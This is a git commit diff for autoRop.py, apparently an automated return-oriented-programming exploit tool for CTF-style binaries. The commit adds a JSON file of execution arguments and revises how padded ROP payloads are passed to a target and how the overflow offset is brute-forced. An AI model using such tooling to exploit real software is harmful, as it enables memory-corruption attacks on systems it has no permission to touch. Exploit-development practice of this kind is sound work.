pass exec args
This commit is contained in:
Liam Dalgarno
parent
7934330d2e
commit
055b787c2d
22
autoRop.py
22
autoRop.py
@ -43,6 +43,7 @@ arg_parser.add_argument("--max_payload", metavar="max", default=16384, type=int,
|
||||
arg_parser.add_argument("--input_method", metavar="method", choices=['arg', 'file', 'stdin'], default='arg', help="Method of passing the payload to the target binary")
|
||||
arg_parser.add_argument("--run", action="store_true", default=False, help="Automatically run the ROP on the executable")
|
||||
arg_parser.add_argument("--interactive", action="store_true", default=False, help="Automatically run the ROP on the executable")
|
||||
arg_parser.add_argument("--exec_args_file", metavar="exec_args_file", default="exec_args.json", type=str, help="The path to the file containing the arguments to pass to the executable. Put $PAYLOAD$ where you want the payload to be placed.")
|
||||
|
||||
args = arg_parser.parse_args()
|
||||
|
||||
@ -54,18 +55,27 @@ max_payload = args.max_payload
|
||||
run = args.run
|
||||
input_method = args.input_method
|
||||
interactive = args.interactive
|
||||
exec_args_file = args.exec_args_file
|
||||
|
||||
exec_args = []
|
||||
with open(exec_args_file, "r") as f:
|
||||
exec_args = json.load(f)
|
||||
|
||||
payload_idx = exec_args.index('$PAYLOAD$')
|
||||
|
||||
def run_program(payload: str, **kwargs) -> process:
|
||||
p = None
|
||||
if input_method == 'arg':
|
||||
p = process([f'./{exec_file}', payload], **kwargs)
|
||||
exec_args[payload_idx] = payload
|
||||
p = process([f'./{exec_file}'] + exec_args, **kwargs)
|
||||
elif input_method == 'file':
|
||||
with open('/tmp/input.txt', 'wb') as f:
|
||||
f.write(payload)
|
||||
f.flush()
|
||||
p = process([f'./{exec_file}', '/tmp/input.txt'], **kwargs)
|
||||
exec_args[payload_idx] = '/tmp/input.txt'
|
||||
p = process([f'./{exec_file}'] + exec_args, **kwargs)
|
||||
elif input_method == 'stdin':
|
||||
p = process([f'./{exec_file}'], **kwargs)
|
||||
p = process([f'./{exec_file}'] + exec_args, **kwargs)
|
||||
p.send(payload)
|
||||
|
||||
return p
|
||||
@ -90,10 +100,8 @@ def find_offset_inc(low: int, high: int):
|
||||
for i in range(low, high + 1):
|
||||
print(f" ├─[🤔] Trying offset {i}...")
|
||||
rop_payload = (b'A' * i) + original_payload
|
||||
proc = run_program(rop_payload, alarm=1)
|
||||
output = proc.readall()
|
||||
print(output)
|
||||
if b'[ Successful ROP! ]' in output:
|
||||
proc = run_program(rop_payload)
|
||||
if b'[ Successful ROP! ]' in proc.readall():
|
||||
print(f" └─[😳] Found offset at {i}!\n")
|
||||
return i
|
||||
|
||||
|
||||
1
exec_args.json
Normal file
1
exec_args.json
Normal file
@ -0,0 +1 @@
|
||||
[ "$PAYLOAD$" ]
|
||||
Binary file not shown.
Loading…
Reference in New Issue
Block a user